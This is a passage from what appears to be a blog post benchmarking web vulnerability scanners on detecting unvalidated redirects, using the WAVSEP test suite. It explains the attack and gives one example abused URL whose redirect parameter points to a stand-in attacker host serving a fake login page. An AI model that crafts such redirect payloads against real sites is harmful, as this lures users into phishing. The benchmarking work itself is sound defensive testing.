&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;These accuracy assessments were also performed under &lt;b&gt;optimal
&lt;/b&gt;conditions (or at least as optimal as we could create), since the purpose
was to see how well the detection logic functions, with no interference from
various barriers that can affect it in applications.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Such optimal conditions included scanning relatively small
groups of URLs, using a limited amount of threads, defining optimal
configuration entries (in some cases), and so on.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Therefore, to reproduce these results, it is necessary to
follow the exact instructions listed in the various scan logs included in &lt;a href=&quot;http://sectoolmarket.com/&quot;&gt;sectoolmarket&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;10. Test III - Unvalidated Redirect Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;The third assessment criterion was the detection accuracy of
&lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Unvalidated Redirect&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;, a common exposure which is also a commonly
implemented feature in web application scanners, and most importantly, a &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;NEW&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;
&lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;TEST&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; in WAVSEP which the vendors were not aware of prior to the
publication of this article.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s also included in &lt;a href=&quot;https://www.owasp.org/index.php/Top_10_2010-A10&quot;&gt;OWASP TOP 10 2010&lt;/a&gt;
and in &lt;a href=&quot;https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards&quot;&gt;OWASP
TOP 10 2013&lt;/a&gt;, and represents a continued effort to make WAVSEP as compliant
as possible with the various OWASP TOP 10 lists.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This score chart is different from the rest because unlike
  the rest of the detection accuracy charts, it calculates the score only based
  on QueryString/GET test cases, and does not take into account the HTTP POST
  test cases. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The reason to include only GET test cases in the score
  calculation is related to the properties of an unvalidated redirect attack:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s essentially a phishing enhancing attack which relies
  on web site redirection features that redirect the browser to user-controlled
  addresses sent in the input. These attacks eventually redirect the user to an
  attacker controlled website, while misleading even cautious users that verify
  the domain address prior to accessing a link. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For example:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Original URL -&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://domain:port/app/login.jsp?nextPage=internal.jsp&quot;&gt;http://domain:port/app/login.jsp?nextPage=internal.jsp&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Abused URL -&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://domain:port/app/login.jsp?nextPage=http://hacker-domain:port/fake-login.jsp&quot;&gt;http://domain:port/app/login.jsp?nextPage=http://hacker-domain:port/fake-login.jsp&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A case could be made to state that since submitting
  malicious redirect values in POST parameters requires the user to first access
  an &lt;b&gt;HTML form&lt;/b&gt; in an &lt;b&gt;attacker controlled website&lt;/b&gt;, than there&#39;s no
  point in performing this attack at all, since the user already
  &quot;trusted&quot; the attackers website.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In fact, this statement is well ingrained in the
  perception of many tool authors, which usually don&#39;t submit any redirect
  payloads in POST parameters.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Several arguments can be made against that perception:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) Detecting &lt;b&gt;persistent unvalidated redirect&lt;/b&gt;
  attacks (like persistent XSS attacks) in which the payload is
  &quot;injected&quot; into the database and affects other users, may very well
  justify sending redirect payloads in POST parameters.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) Detecting &lt;b&gt;session-hosted unvalidated redirect&lt;/b&gt;
  attacks and &lt;b&gt;pages&lt;/b&gt; in the actual website that &lt;b&gt;embed externally
  supplied URLs in a form&lt;/b&gt; that will later be submitted using POST may
  justify performing POST tests as well.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Regardless of whether the argument is true or not, due to
  the lack of support for POST unvalidated redirect tests in most of the tested
  products, I decided not to include the POST test cases in this benchmark,
  despite the fact that they are already included in WAVSEP, and despite the various
  scenarios in which testing POST parameters with unvalidated redirect payloads
  may lead to valid vulnerabilities (persistent redirect, session redirect,
  reprinted redirect form, etc).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;The POST test cases may however be included in the next
  benchmark, in one way or the other, and the full results are already included
  in the relevant scan logs of sectoolmarket.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to assess the detection accuracy of different unvalidated
redirect instances, I used a total of &lt;b&gt;30-60&lt;/b&gt; test cases (for 302
redirection, and even for JS redirection). I also used a bunch of false positive
test cases, to see how permissive the detection process is. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; unvalidated redirect
detection accuracy is documented in detail in the following section of
sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;color: blue; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://sectoolmarket.com/unvalidated-redirect-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/unvalidated-redirect-detection-accuracy-unified-list.html&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the &lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt; &lt;/b&gt;bar
represents false positive &lt;u&gt;categories&lt;/u&gt; detected by the tool (which may
result in more instances then what the bar actually presents, when compared to
the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Unvalidated Redirect Detection Accuracy of Commercial/SAAS
Scanners &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_19&quot;
 o:spid=&quot;_x0000_i1053&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:168pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image027.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeETvc2sQmjfBQE4vrT6KrAoSk96p1z1MiSleqgzE02v_63VjCh1w43CCSlv8oUrLaYxR0-Zdzek2xDGYPkjybOixMJNguF4Yef0whxvdmapH1ueZ4AQQImIRKOnq5_wpUTjmWoPWF14/s1600/%25287%2529+Test+3-+Commercial+AND+SAAS+-+Unvalidated+Redirect.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeETvc2sQmjfBQE4vrT6KrAoSk96p1z1MiSleqgzE02v_63VjCh1w43CCSlv8oUrLaYxR0-Zdzek2xDGYPkjybOixMJNguF4Yef0whxvdmapH1ueZ4AQQImIRKOnq5_wpUTjmWoPWF14/s1600/%25287%2529+Test+3-+Commercial+AND+SAAS+-+Unvalidated+Redirect.png&quot; height=&quot;258&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Unvalidated Redirect Detection Accuracy of
Opensource/Free Scanners &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_20&quot;
 o:spid=&quot;_x0000_i1052&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:110.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image029.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
